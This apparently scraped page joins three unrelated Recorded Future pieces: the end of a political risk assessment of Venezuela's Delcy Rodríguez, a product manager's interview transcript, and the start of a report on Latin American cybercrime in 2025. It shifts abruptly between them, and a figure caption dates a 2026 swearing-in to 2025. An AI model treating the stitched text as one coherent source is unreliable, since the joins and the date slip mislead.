• Diosdado Cabello, Minister of Interior, Justice and Peace. Cabello is a senior power broker within the ruling party and has been the PSUV’s Secretary General since 2011. He has deep connections to the security services and hardline enforcement networks, including to pro-government armed paramilitary organizations known as “colectivos” (see Figure 3). State media has sought to downplay reported tensions between Cabello and Rodríguez, but Cabello’s incentives to undermine her are straightforward: Her consolidation of power threatens his influence over the party, the security apparatus, and his networks. He is also the only current cabinet member who was named in the unsealed drug trafficking indictment US prosecutors issued to capture Maduro, and he likely suspects that Rodríguez may eventually hand him over to the US.
• General Vladimir Padrino López, former Minister of Defense. Padrino’s Lopez’s likely core incentive is to preserve the influence he accumulated after over a decade as the institutional head of the FANB, and to preserve the patronage networks he developed as the country’s longest-serving defense minister. He also likely seeks to protect himself and senior officers loyal to him from eventual prosecution for corrupt activities or involvement in repression, and therefore very likely views Rodríguez’s government as a challenge to longstanding FANB impunity. While there is no public evidence of any cracks between Padrino López and Rodríguez, it is very likely that he will resist meaningful reforms inside the armed forces
• Major General Alexis Rodríguez Cabello, Director of the Servicio Bolivariano de Inteligencia Nacional (SEBIN). Cabello is a cousin of Diosdado Cabello and is believed to be close to him. As head of the primary intelligence service, Rodríguez Cabello has strong incentives to resist reforms that would expose him or his network to prosecution, and to preempt any purge that might impact him or his network.
• Major General Iván Rafael Hernández Dala, former director of the General Directorate of Military Counterintelligence (DGCIM). Hernández Dala, a close confidant of Maduro, was head of DGCIM until replaced by Rodríguez in January 2026. He is also believed to be a longstanding opponent of both Rodríguez and Cabello, and of their respective factions in the PSUV. Even if sidelined from formal command, Hernández Dala likely retains networks inside the intelligence and security apparatus. He likely has incentives to undermine Rodríguez if he anticipates facing prosecution for past abuses, loss of status, or exclusion from any protection or economic deals between Washington and Caracas.
• Business and Political Elites Tied to Maduro. Maduro and Flores dominated Venezuelan politics for nearly thirteen years. During that time, they cultivated a vast network of well-connected economic, military, and political elites that helped them sustain power. Many of them are not overtly tied to the Rodríguez siblings, and instead may be willing to ally themselves with rival factions to advance their own interests. Possible figures in this category include:
  • Tarek William Saab, Acting Ombudsman. Until his resignation in February 2026, Saab served as attorney general since 2017 and held significant influence over how the repressive apparatus was deployed, overseeing detentions and prisoner releases. Saab’s resignation was very likely forced, and he has clear incentives to resist any reform process that reduces his discretion or creates a credible path to independent investigations into past repression or corruption.
  • Nicolas Maduro Guerra, also known as “Nicolasito.” A member of the National Assembly and son of Maduro and Flores, Maduro Guerra is not one of the top PSUV powerbrokers in his own right but has played a crucial role in securing continuity by appearing publicly with Rodríguez and claiming she has his parents’ full support. Given lingering questions over internal Chavista involvement in the January 3 operation, he has leverage to complicate Rodríguez’s narrative and may seek to use it if he feels that his interests are threatened by the Rodríguez administration.
  • Alex Saab. Saab played a crucial role in facilitating sanctions evasion networks until his arrest by US law enforcement in 2020. Saab was later returned to Venezuela in a 2023 prisoner swap, and Maduro rewarded him by making him Minister of Industry and National Production. Rodríguez replaced him in January 2026, likely understanding that Saab was not palatable for US business interests, but Saab likely retains enough social capital within Venezuela’s private sector to pose a challenge to Rodríguez. This is the likely reason why Saab was reportedly detained by Venezuelan intelligence in February 2026, although his lawyer has maintained that he is not under arrest.

Figure 3: Illustration of key internal rivals of Venezuelan Acting President Delcy Rodríguez (Source: Recorded Future)

External Threats to Rodríguez’s Rule

US Pressure to Box Out Geopolitical Adversaries

In the short term, the most significant external threat that Rodríguez faces is a reversal of United States policy — either via renewed military or intelligence operations intended to force her removal, or through a more indirect pressure campaign meant to trigger a domestic fracture. A second US special forces operation to depose her outright is unlikely, but it remains a scenario Rodríguez and her circle will have to treat seriously, given the direct and disproportionate leverage that Washington currently holds over Caracas. More likely than further military action is the prospect of renewed pressure: the US can calibrate sanctions relief, revoke OFAC licences, and facilitate or block diplomatic recognition in ways that shape incentives and perceptions of the regime’s survivability among Venezuelan elites. Recent reporting suggests Washington is simultaneously pursuing deepened energy engagement while remaining skeptical about whether Rodríguez will fully align with US strategic demands, which increases the possibility of an abrupt shift away from Rodríguez if she does not deliver on US priorities.

A major fault line in the US-Venezuela relationship is Venezuela’s ongoing relationships with US geopolitical adversaries, namely China, Russia, Iran, and Cuba, even as the US has increasingly sought to box them out of Venezuela. US officials publicly demanded that Venezuela cut ties with adversary nations and have actively moved to push them out. The US has successfully pressured Venezuela to end fuel shipments to Cuba, and OFAC general licenses intended to facilitate Venezuelan oil and gas activity explicitly do not authorize transactions involving Russian, Chinese, or Iranian entities. In spite of this, Rodríguez has sought to publicly demonstrate an interest in retaining these partnerships.

Opposition Efforts to Limit US-Venezuela Engagement

Another short-term external threat to Rodríguez is opposition figure María Corina Machado. While she remains the most popular opposition figure in Venezuela, and her faction has a demonstrated capacity to organize protests on the ground, these have so far not presented a significant threat to stability or to PSUV governance. Her presence in Washington since December 2025, however, has provided her with a major platform to directly shape the US foreign policy debate over Venezuela. With Machado and close advisors operating from Washington, she has advanced a narrative publicly supportive of the US agenda while privately calling on allies in Congress and in the international community to press for a clearer timetable for new elections and the ouster of the PSUV. She has also used her platform to promise she will return soon, and to highlight perceived inconsistencies between Rodríguez’s actions and her rhetoric, noting, for instance, the gap between the government’s claimed political prisoner release numbers and the figures cited by independent rights organizations.

Figure 4: Photo of Venezuelan opposition leader Maria Corina Machado at a rally ahead of the 2024 presidential election (Source: Reuters)

Machado has received strong support from bipartisan lawmakers in the US House and Senate, who have questioned US engagement with Rodríguez. While Machado’s efforts to raise the political cost of engagement with the Rodríguez government have earned her support from some allies in Washington, the White House has reportedly expressed frustration with her criticism, with officials claiming it undermines US policy. These efforts very likely represent a lesser threat to Rodríguez’s hold on power, given White House insistence on working with Rodríguez, but introduce persistent uncertainty into the sustainability of US support for her.

Calls for a Competitive Election

Beyond these immediate pressures, the most important mid-term threat to Rodríguez and to future PSUV rule is the election timeline reportedly being promoted by the Trump administration. While the US has refrained from presenting a specific timetable, officials ranging from Chargé d’Affaires Dogu to Secretaries Rubio and Wright have increasingly signaled publicly that the US expects to see new elections in the next eighteen to twenty-four months. The specifics of these elections, like whether they would be only presidential or include broader general elections (to replace the PSUV-dominated National Assembly), have not been disclosed, but the US insistence on elections in some form very likely forces Rodríguez to reconcile her approach to coalition management with a desire to seek electoral legitimacy on a compressed timeline.

At the moment, Rodríguez, her inner circle, and PSUV elites almost certainly view a competitive presidential election as an existential threat. Polls have repeatedly demonstrated that the PSUV is unpopular. While Rodríguez is the most popular figure in the PSUV, she would very likely lose a presidential race with Machado by a two-to-one margin, and Machado would very likely defeat any PSUV candidate absent a significant shift in public opinion. Maduro’s removal has not automatically revived grassroots loyalty to the ruling party, with local PSUV leaders describing fractures, demobilization, and severe drops in participation inside local party structures since January 2026.

Given the PSUV’s lack of legitimacy, US support for elections will likely become a flash point in the relationship with Rodriguez. These tensions will also very likely be exacerbated by opposition mobilization inside the country and Machado’s efforts to marshal support in Washington. While US authorities have not yet demanded that Machado be allowed to return to Venezuela (and has reportedly asked her to delay any plans to this effect), her return is almost certain to occur well in advance of an election as she has openly said she will run. The temporary re-arrest of opposition figure Juan Pablo Guanipa in February after he began organizing anti-government rallies suggests the ruling party will likely seek to use the repressive apparatus to restrict Machado’s campaigning efforts, elevating the likelihood of pre-election instability. Even if a competitive election is held under the PSUV, the experience of the July 2024 election suggests that the ruling party is unlikely to recognize the results if the opposition wins, raising the likelihood of post-election instability, protests, and violence.

Delcy Rodríguez’s Origins and Principles of Her Approach to Decisionmaking

Before her emergence in recent years as the face of relative economic pragmatism in Chavismo, Delcy Rodríguez’s background was not well-known internationally. But her rise to power reveals a number of factors that likely inform her approach to governance and likely impact the prospect for political and economic stability moving forward. These include:

• Familiarity with Venezuela’s Intelligence and Repressive Apparatus: In addition to her reputation as an economic reformer, Rodríguez likely has a deep familiarity with intelligence work that, according to state media, goes back to the Chávez years. In 2002-2003, she reportedly worked with the SEBIN’s predecessor agency, the Dirección General Sectorial de los Servicios de Inteligencia y Prevención (DISIP), on undisclosed counterintelligence work involving “geopolitical reports” with former DISIP head Eliezer Otaiza. From the time she rose to the office of Executive Vice President in 2018 until 2021, the SEBIN technically fell under her office. While there is no publicly available evidence that she explicitly directed SEBIN-led repression of dissidents, her role likely afforded her a deep familiarity with the main Venezuelan intelligence agency’s response during the government’s crackdown on the post-2018 election protests and the 2019 protest wave led by opposition figure Juan Guaidó. It is likely that she was, at a minimum, aware of acts of torture, extrajudicial executions, arbitrary detentions, and other alleged human rights violations and crimes against humanity since 2014 that have been credibly documented by the Independent International Fact-Finding Mission on Venezuela created by the United Nations (UN) Human Rights Council.
• Identity Shaped by Revolutionary Politics: Rodríguez was born in Caracas in 1969 and grew up in a politically active left-wing family. Her father, Jorge Antonio Rodríguez, founded an armed urban guerrilla group and was killed in police custody in 1976, allegedly under interrogation. His death made him a martyr among the Venezuelan left, which cemented the revolutionary identities of Rodríguez and her older brother Jorge from an early age. Rodríguez has framed her decision to study law as an effort to “do justice for her father’s case,” and both she and her brother routinely cite his death as a justification for their support for Hugo Chávez and the movement he founded. In public, Rodríguez has repeatedly expressed strong support for the ruling party’s socialist ideology. In a September 2019 address to the United Nations General Assembly, she criticized “capitalist supremacism” and ended with a call to “save the world from capitalist violence.”
• Willingness to Break from Ideological Purity: In practice, Rodríguez’s rise demonstrates that she is open to abandoning ideological purity in order to accomplish her objectives. Unlike Maduro and other ruling party figures who developed close personal ties to Chávez, she had a notoriously poor relationship with the former leader and spent significant time outside Venezuela in her formative years. Rodríguez studied law at the Central University of Venezuela, but later pursued postgraduate studies abroad in labor law in London and Paris, and reportedly spent time in the United States. She speaks English and French. Rodríguez returned to Venezuela after an opposition-led failed coup attempt against Chávez in 2002, and first worked as an advisor in the Foreign Ministry, and then as Deputy Minister for European Affairs before ending up as Chávez’s Minister for Presidential Affairs. She did not last long in this position, however, and was abruptly dismissed after she reportedly argued with and insulted him during a presidential visit to Moscow. Rodríguez then adopted a lower profile in Venezuelan political life until Maduro took power, who made her his foreign minister in 2014. As foreign minister (2014-2017), president of the pro-government National Constituent Assembly (2017-2018), and then as executive vice president (2018-2026), she developed a reputation as a shrewd political operator and staunch Maduro ally.
• Interest in Addressing PSUV’s Declining Popularity: Although Rodríguez was and arguably remains a Maduro ally, she has demonstrated a clear awareness of how the PSUV’s economic mismanagement has led to its declining popularity and has shown an interest in reversing it. Ahead of the 2018 presidential election, she briefly led a satellite party of the PSUV called the Movimiento Somos Venezuela (“We Are Venezuela Movement”) and served as its leader in a likely attempt to “rebrand” Chavismo and connect with a younger generation of Venezuelans. She was officially reincorporated into the PSUV’s leadership in late 2018 after her party failed to account for more than six percent of Maduro’s reelection vote. When Maduro made Rodríguez his Minister of Economy in 2020, she began to advance an agenda of relative economic liberalization, and brought on a team of Ecuadorean advisors to impose tighter fiscal discipline and stabilize the exchange rate, eventually promoting the de facto dollarization of the economy. The success of the policies contributed to a modest but important economic rebound and led Maduro to appoint her in 2024 as Energy Minister as well, a post she technically still occupies. In overseeing this economic agenda, she began to cultivate a reputation for herself as less of an ideologue and more of a pragmatist, and began to pursue closer relationships with major energy companies and other investors. This reputation almost certainly contributed to the US decision to engage with her government after removing Maduro.
• Calculating Operator with Sense of Persecution: Rodríguez has a history of keeping track of past instances where she has been slighted, even referring to her support of Chavismo and of its revolution as her and her brother’s “personal revenge” for the death of their father. Rodríguez herself has alluded to this trait on state media. In a 2024 appearance on the Con Maduro Podcast, she recalled running into former Argentine President Mauricio Macri, a vocal critic of the Venezuelan government, at the 2022 World Cup in Qatar. Macri had recently been made the Executive Chairman of the FIFA Foundation, and, according to Rodríguez, she shook his hand and told him: "Did you see where you are now, and where we are? We're with the Venezuelan people. And you? You're here picking up balls.” Rodríguez is also a savvy operator, and her rise to prominence reflects not only her ability to deliver on economic policy objectives but also her ability to outmaneuver rivals. The best-known instance of this is her leadership of an anti-corruption campaign in 2024, which resulted in the imprisonment of former vice president, oil minister, and longtime rival Tareck El Aissami.
• Openness to Dialogue with Washington: Even before the current rapprochement between Washington and Caracas, Rodríguez was known for consistently favoring a deeper diplomatic relationship with Washington — albeit one built on mutual respect. During the 2022 phase of exploratory talks in which the two countries negotiated sanctions relief in exchange for holding presidential elections in 2024, Rodríguez publicly maintained that the relationship “cannot be conditioned,” saying that Venezuela’s doors were open to any country that arrived “with respect” and treated it as an equal under international law. During this period, she specifically centered the importance of discussing US oil and gas interests in bilateral diplomacy, saying that Venezuela was willing to pursue “energy dialogue” with US firms, indicating a view of energy cooperation as a channel for de-escalating tensions.

A Framework for Anticipating Delcy Rodríguez’s Policy Decisions

When Delcy Rodríguez faces policy decisions that impact economic and political stability in Venezuela in the coming months, her approach is likely informed by the pillars described above: her revolutionary identity, tactical pragmatism, openness to US engagement, an interest in restoring popular support for the PSUV, a long memory for slights, and familiarity with the security apparatus, as well as the internal and external short- and mid-term threats to her rule. Given these factors, Insikt Group assesses that she is very likely to prioritize near-term governability and economic stabilization over maximalist ideological positioning, while likely cooperating with the US in ways that preserve her credibility inside the ruling coalition. This matters for prospective investors because it suggests the Venezuelan government is likely to seek to maintain a pragmatic economic policy environment focused on short-term macroeconomic stability. At the same time, companies seeking to invest will almost certainly continue to face elevated sanctions compliance risks and potential policy reversals depending on the evolving Washington-Caracas relationship, making it critical to closely monitor Rodríguez’s evolving policy decisions and internal relationships.

Coalition Management over Open Confrontation with Rivals

Rodríguez will likely prioritize maintaining and reconfiguring her coalition over seeking conflict with internal rivals, because the external pressure she faces makes internal rupture more risky than compromise. Her main rival, Diosdado Cabello, has significant sway over the repressive apparatus and over pro-government armed “colectivos” loyal to him, and his removal could therefore provoke unrest and destabilizing violence. This is precisely the kind of chaos Washington has sought to avoid, and very likely why it opted to keep Rodríguez in place as interim president in the first place. She therefore likely assesses that purging, detaining, or otherwise sidelining Cabello or other top PSUV rivals could risk calling into question her ability to maintain order, and would undermine her position with Washington as a lynchpin of relative calm and continuity.

This is likely the reason that Rodríguez has sought to balance the ruling coalition since taking power rather than immediately shaping it to align with her preferences. Although she elevated her allies to higher positions in her government early in her tenure — such as appointing Calixto Ortega as Vice President of Economy — she has largely kept the ruling apparatus in place. Not only has she left a number of other figures close to Cabello in their positions, but she has also promoted figures in Cabello’s network. Just three days after Maduro’s capture, she named Gustavo González López, believed to be a Cabello ally, to lead both the Presidential Honor Guard and the Directorate General of Military Counterintelligence (DGCIM). On March 18, she also named González López to be her Defense Minister, replacing Padrino López. She also appointed Cabello’s daughter, Daniella Cabello, to be Minister of Tourism — a significant post that will afford her a direct role in reopening Venezuela to international commercial activity. These moves were likely taken out of a desire to effectively secure Cabello’s support for her economic normalization agenda.

Face-Saving Cooperation with Washington

Rodríguez will likely continue to cooperate with Washington’s energy priorities, but she will very likely pair this compliance with visible signaling aimed at saving face with PSUV loyalists. This is likely why, even as she has received high-level US officials in Caracas and even spoken with Trump over the phone, she has publicly demonstrated support for retaining partnerships with US adversaries. On January 8, for instance, Cuban Foreign Minister Bruno Rodríguez traveled to Caracas and accompanied the interim president to speak at a commemoration event at Venezuela’s Military Academy for the Cuban and Venezuelan casualties from the January 3 US operation to capture Maduro. This was Rodríguez’s first event in which she officially presided over a military ceremony as commander in chief of the armed forces. On the same day, state-run media reported that Rodríguez held a meeting with Chinese Ambassador to Venezuela Lan Hu, in which she thanked China for its support for Venezuelan sovereignty and described the encounter as “cordial.” The ambassadors of China, Russia, and Iran were given front row seats to Rodríguez’s January 5 swearing-in ceremony, and state TV broadcast images of the Venezuelan leader greeting them affectionately.

Figure 5: Screenshot of Venezuelan state TV broadcast showing Chinese ambassador Lan Hu, Russian ambassador Sergey Mélik-Bagdasárov, and Iranian ambassador Ali Chegueni were prominently seated at Venezuelan Acting President Delcy Rodríguez’s January 5, 2025, swearing-in ceremony (Source: Telesur)

Such gestures will very likely continue as they offer Rodríguez a way to preserve credibility among PSUV elites and everyday party faithful. She can claim that her rapidly evolving relationship with Washington is a sovereign decision that improves stability and living conditions, rather than a relationship that is shaped by a drastically uneven playing field. As part of presenting an image of mixed compliance with Washington’s demands for Venezuelan audiences, she will almost certainly continue insisting that Maduro remains the legitimate president and demand his return, even as she works to consolidate her own power.

Leveraging Hardliners to Justify Non-Compliance

The internal rivalries identified above represent significant threats to Rodríguez’s legitimacy inside the PSUV and her claim to power, and attempting to balance her coalition while consolidating her control will almost certainly be a major challenge for Rodríguez. However, it is likely that Rodríguez will, over time, point to alleged hardliners to justify selective non-compliance with US aims, credibly or otherwise. Ultimately, it may be useful for Rodríguez to be able to point to ongoing tensions in her coalition or the prospect of instability as a way of warding off US pressure for an eventual transition or for competitive elections to be held. This justification is likely to lose credibility over time if she continues to consolidate administrative control and accumulate legitimacy, especially if she presides over significant economic gains amid US sanctions relief. Ultimately, the very steps that allow her to consolidate her rule may eventually be used by Washington to justify accelerating the end of it.

Resistance to Elections if Seen as an Existential Threat

Rodríguez’s past political experience and the PSUV’s record across more than 25 years of governing suggest the Venezuelan government will very likely seek to maximize political gain from any economic growth resulting from US sanctions relief and economic normalization. And while US officials have routinely conveyed that they expect elections to be held in the next two years, the Venezuelan government is almost certain to resist or sabotage elections unless it perceives that economic improvement has boosted the PSUV’s chances of winning a competitive election. Even then, the PSUV will very likely seek to use its control of government to activate patronage networks, divert public resources to politicized social programs, and attempt to present legal obstacles to opposition campaigning — just as it did in the lead-up to the 2024 presidential election.

Ultimately, this logic is consistent with how Chavista elites have historically conceptualized elections: In multiple instances of US-backed talks meant to offer sanctions relief in exchange for competitive elections, Venezuelan government negotiators routinely argued that elections can be considered “fair” only if voters can judge the government without the distorting economic effects of sanctions. If economic growth does not translate into a boost in popular support for the ruling party, Rodríguez will likely come under increasing pressure from rivals to resist a US-backed transition. It is therefore likely that democratization in Venezuela will be phased and gradual, not immediate, and will likely depend in large part on whether elements of the ruling elite see a viable future for themselves in the country as a possible outcome after alternating power.

Outlook

Over the coming months, Delcy Rodríguez is very likely to prioritize near-term governability and economic stabilization over maximalist ideological positioning, while still finding ways to cooperate with the United States that preserve her rule and credibility inside the ruling PSUV coalition. In the short- to mid-term, the main challenge she faces is the threat posed by internal rivals who may feel threatened by her reforms. This makes her cabinet changes, and evidence of backlash among political and economic elites, crucial variables to watch. In confronting internal threats to her rule, she will likely pursue a strategy of coalition management over one of open confrontation. Even as Rodríguez continues to consolidate power and tries to keep hardline rivals contained, she will likely avoid high-risk moves that could fracture elite support and risk threatening her relationship with Washington.

In the short and mid terms, the main flashpoints will be US pressure to end Caracas’s relationships with Moscow, Beijing, and other US adversaries, as well as US pressure to hold competitive elections in the next two years and eventually to advance a political transition. Rodríguez and PSUV elites likely view a genuinely competitive presidential vote as an existential threat. As a result, the government is almost certain to resist or sabotage competitive elections unless economic improvement significantly boosts the PSUV’s electoral odds. Even then, it would likely use patronage, politicized social programs, and legal obstacles to constrain opposition campaigning and preserve an institutional advantage. This raises the prospect of instability both in the lead-up and in the aftermath of any elections, given the likelihood of opposition protests and an associated crackdown. Given these dynamics, any transition is more likely to be phased and gradual than immediate, with stability hinging on whether Rodríguez is able to consolidate support among the ruling elite and whether the broader Chavista coalition can see a viable future for itself under any eventual alternation of power.


Appendix A: 2026 OFAC Licenses Issued for Venezuela

Table 1: A list of OFAC general licenses issued since the passage of the Venezuela hydrocarbons law(source: US Office of Foreign Assets Control)

Read the Full Video Transcript:

I’m Kyle Kohler. I’m a product manager over the integration strategy at Recorded Future.

Recorded Future is the world’s largest threat intelligence provider. We are covering all sorts of domains of intelligence. It’s geopolitical intelligence, cyber intelligence, payment fraud intelligence. And essentially intelligence is this data that an organization uses to take action and make a better decision. So the more that you understand a subject or topic, a current event, the better that you can define what actions you take to either defend your organization or proactively increase your competitive edge.

As a product manager, it’s funny. I see it as this arson firefighter educator role. And I think that definitely needs to be unpacked a bit. As an arson, you’re starting fires. So, very strategically, which fire do I put under which team, under which initiative, which fire do I stoke and one do I burn hotter? And as a firefighter, you’ve got maybe fires coming in being reported to you from a customer, from an organization, from another product team who needs this other product team to make something happen. And so, you’re very strategically figuring out what to stamp out, what to stoke. And as an educator, you’re also teaching others how to start fires and put out fires. So, you’re constantly going from one thing to the next and keeping all of these moving pieces going. There’s no one project that you just shepherd along and that’s the only thing you work on. You’re constantly context switching and a good product manager has that multi-domain knowledge to think laterally, but also track how this thing affects that thing and how it might affect the other thing in the future.

At Recorded Future, we’re a global organization and I’m based on the west coast of California. So I wake up in the morning and the first thing I’ve got are 10 to 12 Slack messages from across the globe that come in from different geographies. Other people are ending their day and they’ve got some questions that maybe I can answer or they’re looking for how to direct on who might have the right answer. So the first thing generally starts with voraciously checking Slack and I’m answering notifications as I mentioned questions and the next thing is okay well from the answers to those questions are there new initiatives that need to get spun up or are there existing initiatives that need to get nudged along or are there certain fires that need to get stamped out and that’s the whole day is you’re really tracking where things are in their current state what needs to get responded to and what needs to get pushed along.

Recorded Future really was attractive to me because it was a pretty new field within cyber security and within technology but also as a company was not just related to IT and cyber had this geopolitical and payment fraud type of angle looking at the world. So it was really taking a big data problem how do you track everything that happens everywhere but then how do you break that down into these bite-sized pieces that ultimately help an organization’s current mission. So I really was attracted by the fact that we are helping organizations secure the world. We’re able to do that by securing the world with intelligence, but it’s so multi-domain that you’re just never going to get bored. There’s always something new. There’s always something to track. There’s always some new threat. There’s always some new initiative, some new innovation. And Recorded Future has really been at that cutting edge of innovation. Always coming up with what’s next in the market, what’s next in the threat landscape and how will we as a company address supercharging the existing missions of our organizations that we help today.

Original content: https://venturefizz.com/insights/what-i-do-at-recorded-future-senior-product-manager/

This report provides an overview of trends and developments in the cybercriminal ecosystem of Latin America and the Caribbean (LAC) in 2025. Insikt Group found that threat actors operating in or targeting the LAC region predominantly use client-server applications and end-to-end encrypted messaging platforms such as Telegram, as well as established English- or Russian-speaking dark web and special-access forums, to communicate and conduct activities. Threat actors demonstrate increased sophistication in their operations, adapting their tactics, techniques, and procedures (TTPs) over time, while still relying primarily on traditional methods such as phishing and social engineering, malware distribution, and ransomware. Based on our analysis, we have determined that Brazil, Mexico, and Argentina were the countries most targeted by financially motivated cybercriminals, likely because they are LAC's largest economies. Additionally, based on this research, Insikt Group found that threat actors often targeted critical industries such as healthcare, finance, and government because they hold high-value data, face operational urgency, and, at times, rely on legacy systems that may be vulnerable.

Key Findings

• Insikt Group assesses that criminal forum DarkForums and the messaging platform Telegram are the primary special-access forums and communications platforms used by threat actors operating in or targeting the LAC region.
• Threat actors operating in or targeting LAC are typically financially motivated and frequently leverage social engineering, ransomware, and various forms of mobile malware to gain initial access to government, healthcare, and financial institutions.
• In 2025, Insikt Group recorded 452 ransomware incidents impacting the LAC region. The top five industries affected were healthcare, manufacturing, government, information technology, and education, all of which observed a noticeable increase in attacks compared to the previous year.
• Insikt Group continued to identify banking trojans being leveraged by threat actors, with established variants being the most widely used. Specifically, threat actors used banking trojans in targeted smishing campaigns targeting WhatsApp users to gain access to financial data and steal credentials.
• Insikt Group identified LummaC2 as the most prolific information stealer (infostealer) affecting organizations in LAC in the first half of 2025 and Vidar in the second half, following law enforcement disruption of LummaC2.

Background

In the aftermath of the COVID-19 pandemic, the LAC region underwent rapid digital development that outpaced security maturity, leading to asymmetrical cloud adoption, reliance on legacy infrastructure, and the introduction of remote work across all verticals. Many organizations adopted software-as-a-service (SaaS) platforms without effectively implementing strong access controls or multi-factor authentication (MFA) methods, leaving them exposed to ransomware and data theft, among other cyberattacks. Economic instability (inflation and currency controls) in LAC countries has created incentives for cybercrime while weakening institutional defenses. Political volatility, social protests, and corruption have created new opportunities for financially and politically motivated threat actors. Compounded factors such as high youth unemployment, income inequality, and the influence of informal economies have driven individuals to seek alternative sources of income, which in turn fuels much of the cybercrime we see today.

According to a World Economic Forum report, 13% of respondents in the LAC region expressed low confidence in their country’s preparedness to respond to significant cyber incidents. Despite significant progress in digital government, regulatory advancements, and investments in the region, many countries still lack the technical competence in their workforce and the resources to sustainably harden their environments. Many LAC government networks hold large amounts of sensitive data but are deficient in their security best practices, leaving their systems vulnerable to cyberattacks. Large breaches are routinely circulated, recycled, and resold on dark web marketplaces, enabling identity theft, synthetic identity fraud, SIM swaps, and account takeovers, among other types of cybercriminality to flourish at a larger scale.

Although the LAC region has made significant technological advancements, particularly in the financial services sector, innovations are creating new challenges. The financial technology industry has introduced mobile banking applications, digital wallets, and instant payment systems. LAC countries face rising levels of cyber-enabled fraud in the financial sector because real-time payment rails have weaker identity verification controls, rendering social engineering attempts more effective. Instant payment systems, such as Brazil’s PIX and similar mobile banking platforms, have often been targeted by threat actors. With faster transaction speeds at higher volumes, detection and recovery efforts have become increasingly complex, making scams significantly more profitable and scalable.

The LAC region has the world's fastest-growing rate of disclosed cyber incidents, though many remain unreported. Only seven LAC countries have plans to protect their critical infrastructure from cyberattacks, and only twenty have Computer Security Incident Response Teams (CSIRTs). Despite 31 LAC countries having some form of legislation addressing cybercrime, many face skills shortages, creating barriers to enforcement. Limited law enforcement resources and unreliable interstate cooperation further delay investigation and prosecution, enabling threat actors to operate across jurisdictions with relative ease. A cultural perception that cybercrime carries low risk and offers high reward undermines the deterrent effect that reliable law enforcement action would otherwise have. This incentive structure, coupled with reduced stigma, encourages repeat offenses and recruitment, as reflected in the cybercriminal trends observed by Insikt Group in 2025.

Cybercriminal Activities in LAC

Throughout 2025, Insikt Group investigated and identified different types of cybercriminals operating on clearnet and dark web sources. Cybercriminals routinely leveraged phishing for initial access, and among the most common methods seen was the search and collection of sensitive information directly from a compromised host's file system or databases. This technique is often a critical pre-exfiltration step used to obtain financial records, passwords, and other forms of personally identifiable information (PII), likely to conduct account takeovers or fraud. Insikt Group research found that cybercriminals have also begun evolving their TTPs to exploit near-field communications (NFC) to commit financial fraud and are using malware to target cryptocurrency wallets. Insikt Group intelligence indicates that cybercriminals are primarily interested in selling compromised databases and access methods, as well as participating in hacktivist collectives. In some instances, advanced persistent threats (APTs) have also begun to overlap their activities with cybercrime when targeting the region.

Cybercriminal Sources

Threat actors operating in or targeting the LAC region continued to rely on the infrastructure of established English- and Russian-speaking forums throughout 2025 (see Appendix A). Insikt Group identified Spanish- and Portuguese-language postings on several established dark web and special-access forums. Even though these sources are predominantly English- and Russian-speaking, these posts likely indicate a preference among threat actors targeting LAC to seek more established, traditional platforms for conducting business. Research showed that low to moderate-tier forums are most commonly used by threat actors based in or targeting LAC countries, possibly suggesting lower levels of sophistication, as higher-tier forums often require vouching, payment, demonstration of knowledge or technical abilities, and sometimes private invitation to gain access.

Insikt Group assesses that most communications between threat actors likely occur on encrypted messaging platforms such as Telegram, WhatsApp, and Signal due to speed, ease of access, and higher levels of trust among group members. Given the privacy-enhancing features of many of these platforms, collection efforts can become significantly more constrained. Telegram is predominantly used because it offers larger channel and group capacities, account creation is simple, it enables threat actors to leverage bot automation and support for their malicious activities, and content moderation is typically less stringent than on other platforms. By offering a path of least resistance, threat actors enjoy the added privacy that end-to-end encrypted messaging platforms provide without delaying their operations.

Financially motivated threat actors often advertise a variety of data types, including PII, financial data, login credentials, system access credentials, exploits and vulnerabilities, malware, ransomware, and hacking tutorials. In some instances, Insikt Group observed threat actors selling customer relationship management (CRM) access, virtual private network (VPN) access with domain user privileges and local administrator rights on a database server, and command-and-control (C2) access to LAC-based entities in 2025. Leveraging this access to information, cybercriminals may facilitate further crimes, including but not limited to extortion attempts, digital and social engineering scams, ransomware deployment, data theft, and account takeovers. Insikt Group research indicates that threat actors generally advertise breached databases and payment card data because they can be lucrative, require relatively low levels of sophistication, and are sought after by other cybercriminals.

Threat actors often target government systems because they contain highly sensitive data that can be profitable for scams, identity theft, or extortion. For instance, shortly after a tense general election, Ecuador’s legislature, the National Assembly, reported it had suffered two cyberattacks aimed at accessing confidential data and disrupting the availability of information services. In another example, threat actors exposed sensitive data on millions of Paraguayan citizens on the dark web; among the alleged exfiltrated data are national ID numbers, dates of birth, physical addresses, and health service records.

DarkForums was the primary dark web and special-access forum where Insikt Group recorded the most posts relating to cybercrime-related events in Spanish and Portuguese in 2025. This forum is an English-language, low-tier forum operated by English-speaking administrators, launched in March 2023, and is accessible via a clearnet domain. Additionally, DarkForums was observed hosting leaked databases and data breaches involving Spanish-speaking countries, with posts describing the compromise of thousands of records and credentials. Other forums, such as XSS, Exploit, RehubcomPro, Cracked, BreachForums 2, ProCrd, and CrdPro, were also among the top forums to contain posts in Spanish and Portuguese. Appendix A presents a sample of Spanish and Portuguese forum threads from these sources.

Cybercriminal Tactics and Attack Vectors

The LAC region has a long history of financially motivated cybercrime; as a result, Insikt Group observed in this analysis that threat actors continue to heavily target the financial sector. Threat actors typically rely on traditional initial access methods, such as phishing via email, SMS, and WhatsApp messages, impersonating financial institutions, and requesting invoices or payments. Threat actors deliver lures via malicious links that redirect to fake login pages and contain malicious attachments with embedded links. Many of these techniques are effective when targeting entities in the LAC region due to an overwhelming reliance on email and messaging applications for business, as well as a general strong trust in branded communications. Artificial intelligence (AI) has introduced more sophisticated methods into the cybercriminal ecosystem in LAC, lowering the barrier to entry for threat actors and significantly increasing the scalability of attacks through automation. AI helps threat actors create more effective phishing messages that could be generated in native Spanish or Portuguese, rendering them more convincing to the local target audience. The advent of agentic AI also presents new opportunities and attack vectors for cybercriminal groups to exploit and greatly facilitates cybercrime-as-a-service. Organized criminal groups have integrated AI into their operations to assist with drug smuggling, money laundering, cyber-enabled fraud, and malware development.

